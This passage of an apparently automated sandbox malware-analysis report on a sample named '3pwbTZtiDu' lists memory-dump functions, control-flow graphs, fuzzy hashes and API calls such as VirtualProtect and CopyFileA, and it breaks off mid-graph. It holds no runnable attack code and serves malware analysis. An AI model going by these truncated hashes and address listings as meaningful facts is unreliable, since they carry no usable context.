276 5aa82bc-5aa8340 268->276 269->116 275->116 282 5aa834c-5aa834e 276->282 283 5aa8342-5aa834a 276->283 282->116 283->116 284->6 285->6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2
                                      • API String ID: 0-450215437
                                      • Opcode ID: 28aea787e6247ae75a9f0bf826cbdc3759d7eb0e1d6f7b2dee47e30378fcadf8
                                      • Instruction ID: c5c518df84fb856e6cf2b345ea9d258416953680196c7e57b5cf70149b099c82
                                      • Opcode Fuzzy Hash: 28aea787e6247ae75a9f0bf826cbdc3759d7eb0e1d6f7b2dee47e30378fcadf8
                                      • Instruction Fuzzy Hash: 25E2D274E016298FCB64DF69D888B9EBBB6FB89301F1081E9D449A7354EB305E85CF44
                                      Function 05C75D20 Relevance: 2.4, Strings: 1, Instructions: 1174COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4
                                      • API String ID: 0-4088798008
                                      • Opcode ID: e298b95dbe630d45e1974dfe06cf2cb78dde84532b205e41dc1f2122d9d863ba
                                      • Instruction ID: 8e25b9771f947033e12eb688adcb96a1996dbc0923fbcd12505d45d0eb93da01
                                      • Opcode Fuzzy Hash: e298b95dbe630d45e1974dfe06cf2cb78dde84532b205e41dc1f2122d9d863ba
                                      • Instruction Fuzzy Hash: 25B2F534A00618CFDB14DFA9C894BADB7B6FF88300F158599E506AB7A5DB70AD81CF50
                                      Function 05C76047 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4
                                      • API String ID: 0-4088798008
                                      • Opcode ID: 2881173061c5b7b1bbbf17ece1aa7c07463c1e2ae3b94ab99a96f03a26b8e4b3
                                      • Instruction ID: 84e8e9238cbba5a414687ba93c4f4a2910d3eca2af631a2c40ae7b63fdba7248
                                      • Opcode Fuzzy Hash: 2881173061c5b7b1bbbf17ece1aa7c07463c1e2ae3b94ab99a96f03a26b8e4b3
                                      • Instruction Fuzzy Hash: 83221A34A00619CFDB14DFA5C994BADB7B6FF88300F148599E50AAB795DB30AD81CF50
                                      Function 05C6EDE1 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1179 5c6ede1-5c6ede8 1180 5c6eda3-5c6edc3 1179->1180 1181 5c6edea-5c6ee18 1179->1181 1182 5c6edc5 1180->1182 1183 5c6edca-5c6edd6 1180->1183 1186 5c6ee1f-5c6ee42 1181->1186 1187 5c6ee1a 1181->1187 1182->1183 1190 5c6eddb-5c6eddf 1183->1190 1191 5c6ee45-5c6ee4b 1186->1191 1187->1186 1192 5c6ee54-5c6ee55 1191->1192 1193 5c6ee4d 1191->1193 1194 5c6f092-5c6f100 1192->1194 1195 5c6ee5a-5c6ee5e 1192->1195 1193->1194 1193->1195 1196 5c6f024-5c6f085 call 5c671f0 call 5c68400 1193->1196 1197 5c6f153-5c6f15c 1193->1197 1198 5c6ef33-5c6ef37 1193->1198 1199 5c6f021-5c6f022 1193->1199 1200 5c6efe1-5c6efe2 1193->1200 1201 5c6ee8c-5c6ef19 1193->1201 1202 5c6ef2d-5c6ef2e 1193->1202 1203 5c6f08a-5c6f091 1193->1203 1204 5c6ee6a-5c6ee82 1193->1204 1205 5c6ef5a-5c6efce 1193->1205 1229 5c6f102-5c6f108 1194->1229 1230 5c6f10a-5c6f10f 1194->1230 1195->1204 1207 5c6ee60-5c6ee68 1195->1207 1196->1191 1197->1191 1198->1205 1210 5c6ef39-5c6ef50 1198->1210 1199->1203 1206 5c6efe3-5c6efe5 1200->1206 1214 5c6ef1b-5c6ef21 1201->1214 1202->1206 1204->1191 1209 5c6ee84-5c6ee8a 1204->1209 1205->1214 1228 5c6efd4-5c6efdc 1205->1228 1206->1203 1207->1191 1209->1191 1213 5c6ef52-5c6ef58 1210->1213 1210->1214 1213->1214 1217 5c6ef23 1214->1217 1218 5c6ef2a-5c6ef2b 1214->1218 1217->1198 1217->1200 1217->1202 1217->1205 1218->1202 1228->1214 1229->1230 1232 5c6f114-5c6f117 1230->1232 1233 5c6f111-5c6f112 1230->1233 1232->1197 1233->1232
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: m
                                      • API String ID: 0-662563508
                                      • Opcode ID: 2a8c9310168b041848c5723c27d3fd5d69759572a141df340b5e1ab35db29eee
                                      • Instruction ID: d5c03e5dc07fa4b1e7705d5fe50f6dc1443f04549ff9c3863702bb3c68706f5e
                                      • Opcode Fuzzy Hash: 2a8c9310168b041848c5723c27d3fd5d69759572a141df340b5e1ab35db29eee
                                      • Instruction Fuzzy Hash: 45912A74E04208CFDB14DFA9D488BAEBBF6FB89304F10856AD409A7355DB349A86CF45
                                      Function 05B90040 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Z
                                      • API String ID: 0-1505515367
                                      • Opcode ID: 08c44d89e558956fe552323f0b32cee8f859f1a23763a2c0041960778ea3eddc
                                      • Instruction ID: e61c44340bf5a0519e2d63bd34bf09a25c9a71445bb7fa9f94da0f181a15d639
                                      • Opcode Fuzzy Hash: 08c44d89e558956fe552323f0b32cee8f859f1a23763a2c0041960778ea3eddc
                                      • Instruction Fuzzy Hash: 6E317771E446298BEB6DDF6BCD4469AFAFBAFC9300F14C1F9944CA6254DB701A818F01
                                      Function 05AA5290 Relevance: 1.0, Instructions: 983COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a6713283b208f2bf890bc06580bf3e9254eb9eb1bd54044a86cf82a73b4b78a
                                      • Instruction ID: 7548b2b00efe263a9db173068a2a05ebefc03f4ac00517dcbaf20f4dbc990ea1
                                      • Opcode Fuzzy Hash: 3a6713283b208f2bf890bc06580bf3e9254eb9eb1bd54044a86cf82a73b4b78a
                                      • Instruction Fuzzy Hash: 3FA2B175E00228DFDB65CF69C984AD9BBB2BF89304F1581E9D509AB325DB319E81CF40
                                      Function 05AA8DB3 Relevance: .5, Instructions: 539COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a307273ba57bd2c22976dd16ab3c8c9b2b477fa5cdd18120feff5b75c45424bd
                                      • Instruction ID: a97119c517850b1deff554027bc002a2ae95f566b4d4611236cdc950fd346d49
                                      • Opcode Fuzzy Hash: a307273ba57bd2c22976dd16ab3c8c9b2b477fa5cdd18120feff5b75c45424bd
                                      • Instruction Fuzzy Hash: 8C52B5B4A006298FCB64DF28C988B9AB7B6FF89301F1081D9D94DA7355DB309E81CF55
                                      Function 05C6A210 Relevance: .3, Instructions: 281COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7760c56883949853a3c1999d6da1af2d9662ebedf1e1845c30aab66dbb4c8275
                                      • Instruction ID: e4ee196f12a8f5948f4e314220db3f58e44e83389cb5c0e161864af654b01062
                                      • Opcode Fuzzy Hash: 7760c56883949853a3c1999d6da1af2d9662ebedf1e1845c30aab66dbb4c8275
                                      • Instruction Fuzzy Hash: 24C11A70E05218CFDB14CFAAD884BADBBF2FB89300F2095A9D449B7254DB749A85CF45
                                      Function 05C72908 Relevance: .3, Instructions: 253COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 185dac8a19b521a2a338284501c2bba0296976c73018e423948407f5bd85a3f1
                                      • Instruction ID: bc73de5ce65cc36188d8be3f275e65d52292e20f091aca5ced74272de48a873b
                                      • Opcode Fuzzy Hash: 185dac8a19b521a2a338284501c2bba0296976c73018e423948407f5bd85a3f1
                                      • Instruction Fuzzy Hash: 00B1F378E0021CCFEB24DFAAD885B9DBBF2FB89300F1485A9D409A7654DB705A85CF54
                                      Function 05B97B60 Relevance: .2, Instructions: 240COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e775ef1a08b9da8fd12c823c0b96633c2c6388aa7cf2d4c6d6ea6b08b4d324d4
                                      • Instruction ID: 10b75fd8f746b65270e343806f29f7409d9f05356c58b40820cdbbcd01eb7325
                                      • Opcode Fuzzy Hash: e775ef1a08b9da8fd12c823c0b96633c2c6388aa7cf2d4c6d6ea6b08b4d324d4
                                      • Instruction Fuzzy Hash: 38A1E270E15618CFDB28CFA9D584BADBBF6FF8A304F2080A9D409A7255DB70A945CF50
                                      Function 05B97B70 Relevance: .2, Instructions: 235COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 560aacabb1756290e8abb99aea39c7b048bc9c75681f540e8bb31c4d9725763a
                                      • Instruction ID: bc24ee255d5a05eccd0f6867f815ccfe95f870a7c5b15421e888ca74b5ad56e7
                                      • Opcode Fuzzy Hash: 560aacabb1756290e8abb99aea39c7b048bc9c75681f540e8bb31c4d9725763a
                                      • Instruction Fuzzy Hash: 38A1F470D55218CFDB28CFA9D544BADBBF6FF8A304F2080A9D409A7255DB70A945CF50
                                      Function 05F9E4B0 Relevance: .1, Instructions: 83COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614360770.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5f80000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ef523cd9e15648cff8750e4de4543e3164398902a84301be09dd5791af9fccf0
                                      • Instruction ID: 96c70340062a573d5717c9587272dc72a5c8e17d03910b4e471dbbfe4552e4e1
                                      • Opcode Fuzzy Hash: ef523cd9e15648cff8750e4de4543e3164398902a84301be09dd5791af9fccf0
                                      • Instruction Fuzzy Hash: AF311B74D01618CFEF58DF69D454BA9B7FABB49300F4084AAD50AD7350DB349A84CF05
                                      Function 05B998EA Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 286 5b998ea-5b999b2 295 5b999b8-5b999c3 286->295 296 5b9812d-5b98138 286->296 295->296 297 5b9813a-5b985f1 296->297 298 5b98141-5b99a4e 296->298 303 5b98601-5b9861a 297->303 300 5b99a50 298->300 301 5b99a55-5b99a69 298->301 300->301 301->296 303->296 304 5b98620-5b9862b 303->304 304->296
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: G$O
                                      • API String ID: 0-2636120048
                                      • Opcode ID: 36b12d70092ec193a23f45b7f3e0793a1fe55797971f165cfb230669168eb999
                                      • Instruction ID: e0e6570d4b8a42d1be87cad2a0f62ce7ac3cc115138770d1cbf202c0bc94b2bf
                                      • Opcode Fuzzy Hash: 36b12d70092ec193a23f45b7f3e0793a1fe55797971f165cfb230669168eb999
                                      • Instruction Fuzzy Hash: 8621E2B094122ACFDB64DF28C944BADB7F2BB49300F0084E9E50AA7250EB355E84CF45
                                      Function 05B91AEF Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 305 5b91aef-5b91b6e call 5f95af8 310 5b9011f-5b90127 305->310 311 5b91b74-5b91b7c 305->311 312 5b90129-5b90547 310->312 313 5b90130-5b92a0a 310->313 311->310 312->310 321 5b9054d-5b90553 312->321 316 5b92a14-5b92a4b 313->316 316->310 320 5b92a51-5b92a59 316->320 320->310 321->310
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: R$t
                                      • API String ID: 0-922318671
                                      • Opcode ID: 8b27231f5a4c5ac8a981dbb9b76ecb5bdc01dfe8a66ded64c4957d68d856ee13
                                      • Instruction ID: 3501e7e590b484e6836013dcddc07193e770f95535a74d3be1e4eb9b029ae523
                                      • Opcode Fuzzy Hash: 8b27231f5a4c5ac8a981dbb9b76ecb5bdc01dfe8a66ded64c4957d68d856ee13
                                      • Instruction Fuzzy Hash: 2A016C74A11228DFDB65EF24D984BEDB7B5BB49310F1041E9E94DA3264DB34AE80CF41
                                      Function 05B985E3 Relevance: 2.5, Strings: 2, Instructions: 17COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 323 5b985e3-5b985f1 324 5b98601-5b9861a 323->324 325 5b9812d-5b98138 324->325 326 5b98620-5b9862b 324->326 327 5b9813a 325->327 328 5b98141-5b99a4e 325->328 326->325 327->323 330 5b99a50 328->330 331 5b99a55-5b99a69 328->331 330->331 331->325
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $1
                                      • API String ID: 0-1731886702
                                      • Opcode ID: 7e2aa2966cbeee22537b3ab7c5d4b9b76f3ddee7cc791fbe7c8b231e146e03d1
                                      • Instruction ID: 3278444ed44d7d1d68c3425ac0144a5d5d1b9a44e46adb3f0204e5d2738cd3b6
                                      • Opcode Fuzzy Hash: 7e2aa2966cbeee22537b3ab7c5d4b9b76f3ddee7cc791fbe7c8b231e146e03d1
                                      • Instruction Fuzzy Hash: D2F0C2B0D092A8CFDF60CF24C848799BBB2FB09314F0002E5E00DA3241C334AA88CF02
                                      Function 05CB85CC Relevance: 1.7, APIs: 1, Instructions: 174fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 962 5cb85cc-5cb8643 964 5cb8689-5cb86ae 962->964 965 5cb8645-5cb8659 962->965 969 5cb86b0-5cb86c4 964->969 970 5cb86f4-5cb8763 CopyFileA 964->970 965->964 968 5cb865b-5cb8660 965->968 971 5cb8683-5cb8686 968->971 972 5cb8662-5cb866c 968->972 969->970 978 5cb86c6-5cb86cb 969->978 984 5cb876c-5cb87ce 970->984 985 5cb8765-5cb876b 970->985 971->964 973 5cb866e 972->973 974 5cb8670-5cb867f 972->974 973->974 974->974 977 5cb8681 974->977 977->971 979 5cb86ee-5cb86f1 978->979 980 5cb86cd-5cb86d7 978->980 979->970 982 5cb86db-5cb86ea 980->982 983 5cb86d9 980->983 982->982 986 5cb86ec 982->986 983->982 991 5cb87de-5cb87e2 984->991 992 5cb87d0-5cb87d4 984->992 985->984 986->979 994 5cb87f2 991->994 995 5cb87e4-5cb87e8 991->995 992->991 993 5cb87d6 992->993 993->991 997 5cb87f3 994->997 995->994 996 5cb87ea 995->996 996->994 997->997
                                      APIs
                                      • CopyFileA.KERNEL32(?,?,?), ref: 05CB8753
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614103727.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5cb0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: CopyFile
                                      • String ID:
                                      • API String ID: 1304948518-0
                                      • Opcode ID: acff9714e934aaf7d4a51e10d031c7dd9d1a74be67c8066a92bfc0739e35300d
                                      • Instruction ID: f2074a167199b87d2b342336a045c38929e9705548d8a87e9142a1474f63c50a
                                      • Opcode Fuzzy Hash: acff9714e934aaf7d4a51e10d031c7dd9d1a74be67c8066a92bfc0739e35300d
                                      • Instruction Fuzzy Hash: 2A611270D002598FEF10CFA9C9857EEBBB5BB49304F24952AE815B7290D7B88985CF81
                                      Function 05CB85D8 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 998 5cb85d8-5cb8643 1000 5cb8689-5cb86ae 998->1000 1001 5cb8645-5cb8659 998->1001 1005 5cb86b0-5cb86c4 1000->1005 1006 5cb86f4-5cb8763 CopyFileA 1000->1006 1001->1000 1004 5cb865b-5cb8660 1001->1004 1007 5cb8683-5cb8686 1004->1007 1008 5cb8662-5cb866c 1004->1008 1005->1006 1014 5cb86c6-5cb86cb 1005->1014 1020 5cb876c-5cb87ce 1006->1020 1021 5cb8765-5cb876b 1006->1021 1007->1000 1009 5cb866e 1008->1009 1010 5cb8670-5cb867f 1008->1010 1009->1010 1010->1010 1013 5cb8681 1010->1013 1013->1007 1015 5cb86ee-5cb86f1 1014->1015 1016 5cb86cd-5cb86d7 1014->1016 1015->1006 1018 5cb86db-5cb86ea 1016->1018 1019 5cb86d9 1016->1019 1018->1018 1022 5cb86ec 1018->1022 1019->1018 1027 5cb87de-5cb87e2 1020->1027 1028 5cb87d0-5cb87d4 1020->1028 1021->1020 1022->1015 1030 5cb87f2 1027->1030 1031 5cb87e4-5cb87e8 1027->1031 1028->1027 1029 5cb87d6 1028->1029 1029->1027 1033 5cb87f3 1030->1033 1031->1030 1032 5cb87ea 1031->1032 1032->1030 1033->1033
                                      APIs
                                      • CopyFileA.KERNEL32(?,?,?), ref: 05CB8753
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614103727.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5cb0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: CopyFile
                                      • String ID:
                                      • API String ID: 1304948518-0
                                      • Opcode ID: 10cbdd70faeb0699bf013a4e60299f9de4b91584e98e0604f19d19c6fffa03c1
                                      • Instruction ID: 3ad8737ce2f667097fde712c133db8d0a214b9d9d22eb94294028e3d8144c87d
                                      • Opcode Fuzzy Hash: 10cbdd70faeb0699bf013a4e60299f9de4b91584e98e0604f19d19c6fffa03c1
                                      • Instruction Fuzzy Hash: 52611270D003588FEF10CFA9C9857EEBBB5BB49304F248529E815B7290D7B89985CF81
                                      Function 05C6E1B0 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1034 5c6e1b0-5c6e26c VirtualProtect 1037 5c6e275-5c6e2c5 1034->1037 1038 5c6e26e-5c6e274 1034->1038 1038->1037
                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05C6E25C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 202791b05657be3c9e82b1ec2a279ed693111e962e4d10814f9b504b0df2e02b
                                      • Instruction ID: 35d1d20ae996a13b60b5344ceb6a2d65a0eda8a002823031306d8462619d6ec4
                                      • Opcode Fuzzy Hash: 202791b05657be3c9e82b1ec2a279ed693111e962e4d10814f9b504b0df2e02b
                                      • Instruction Fuzzy Hash: 7131A9B9D042589FCB10CFA9D584AEEFBB1AF49310F14942AE814B7210D739AA45CF94
                                      Function 05AA0921 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1043 5aa0921-5aa09dc VirtualProtect 1047 5aa09de-5aa09e4 1043->1047 1048 5aa09e5-5aa0a2d 1043->1048 1047->1048
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 05AA09CC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: f5df695bb52eadc1c271772e09d5fd8bb10722693654e95302e26f17011f9e8e
                                      • Instruction ID: 289f373aeac928023819afbbedc699b47f18274c818025a76342b397c3ad7abb
                                      • Opcode Fuzzy Hash: f5df695bb52eadc1c271772e09d5fd8bb10722693654e95302e26f17011f9e8e
                                      • Instruction Fuzzy Hash: C73195B9D012489FDF10CFAAE884AAEFBB1BB49310F10942AE815B7210D735A945CF94
                                      Function 05C6E1B8 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1053 5c6e1b8-5c6e26c VirtualProtect 1056 5c6e275-5c6e2c5 1053->1056 1057 5c6e26e-5c6e274 1053->1057 1057->1056
                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05C6E25C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 05837b087afcd64b915302e0b79f43169f8ad29086d6fd982f455c4373a13fc2
                                      • Instruction ID: c2052c754953311695940ccd3ad951854e866eb06edafcd7f1601803f3e430de
                                      • Opcode Fuzzy Hash: 05837b087afcd64b915302e0b79f43169f8ad29086d6fd982f455c4373a13fc2
                                      • Instruction Fuzzy Hash: D631ABB4D052589FCF10CFAAD484AEEFBB5BF49310F14942AE814B7210D735A945CF54
                                      Function 05AA0928 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1062 5aa0928-5aa09dc VirtualProtect 1065 5aa09de-5aa09e4 1062->1065 1066 5aa09e5-5aa0a2d 1062->1066 1065->1066
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 05AA09CC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: de7f32ecab5f5807370c54ad54b35a4aa1be05270c1d8b0a4fb6ecfb67d9e04d
                                      • Instruction ID: 524fa3442c670494d2c666f223ca232b49cdd81026cc78353fd3450c660cccf9
                                      • Opcode Fuzzy Hash: de7f32ecab5f5807370c54ad54b35a4aa1be05270c1d8b0a4fb6ecfb67d9e04d
                                      • Instruction Fuzzy Hash: 443197B5D052589FDF10CFA9D884ADEFBB1BF49310F10942AE815B7210D735A945CF94
                                      Function 05C7B4E0 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1071 5c7b4e0-5c7b4f2 1072 5c7b4f4-5c7b515 1071->1072 1073 5c7b51c-5c7b520 1071->1073 1072->1073 1074 5c7b522-5c7b524 1073->1074 1075 5c7b52c-5c7b53b 1073->1075 1074->1075 1077 5c7b547-5c7b573 1075->1077 1078 5c7b53d 1075->1078 1081 5c7b7a0-5c7b7a8 1077->1081 1082 5c7b579-5c7b57f 1077->1082 1078->1077 1092 5c7b785-5c7b78e 1081->1092 1093 5c7b7aa-5c7b7e7 1081->1093 1083 5c7b585-5c7b58b 1082->1083 1084 5c7b651-5c7b655 1082->1084 1083->1081 1087 5c7b591-5c7b59e 1083->1087 1088 5c7b657-5c7b660 1084->1088 1089 5c7b678-5c7b681 1084->1089 1094 5c7b5a4-5c7b5ad 1087->1094 1095 5c7b630-5c7b639 1087->1095 1088->1081 1096 5c7b666-5c7b676 1088->1096 1090 5c7b6a6-5c7b6a9 1089->1090 1091 5c7b683-5c7b6a3 1089->1091 1097 5c7b6ac-5c7b6b2 1090->1097 1091->1090 1100 5c7b796-5c7b79d 1092->1100 1117 5c7b7fd-5c7b809 1093->1117 1118 5c7b7e9 1093->1118 1094->1081 1098 5c7b5b3-5c7b5cb 1094->1098 1095->1081 1099 5c7b63f-5c7b64b 1095->1099 1096->1097 1097->1081 1103 5c7b6b8-5c7b6cb 1097->1103 1104 5c7b5d7-5c7b5e9 1098->1104 1105 5c7b5cd 1098->1105 1099->1083 1099->1084 1103->1081 1106 5c7b6d1-5c7b6e1 1103->1106 1104->1095 1112 5c7b5eb-5c7b5f1 1104->1112 1105->1104 1106->1081 1109 5c7b6e7-5c7b6f4 1106->1109 1109->1081 1111 5c7b6fa-5c7b70f 1109->1111 1111->1081 1121 5c7b715-5c7b738 1111->1121 1114 5c7b5f3 1112->1114 1115 5c7b5fd-5c7b603 1112->1115 1114->1115 1115->1081 1116 5c7b609-5c7b62d 1115->1116 1122 5c7b815-5c7b831 1117->1122 1123 5c7b80b 1117->1123 1120 5c7b7ec-5c7b7ee 1118->1120 1125 5c7b832-5c7b85f call 5c76d50 1120->1125 1126 5c7b7f0-5c7b7fb 1120->1126 1121->1081 1129 5c7b73a-5c7b745 1121->1129 1123->1122 1136 5c7b877-5c7b879 1125->1136 1137 5c7b861-5c7b867 1125->1137 1126->1117 1126->1120 1129->1100 1131 5c7b747-5c7b751 1129->1131 1131->1100 1138 5c7b753-5c7b769 1131->1138 1158 5c7b87b call 5c7caa9 1136->1158 1159 5c7b87b call 5c7b8e8 1136->1159 1160 5c7b87b call 5c7b8f8 1136->1160 1139 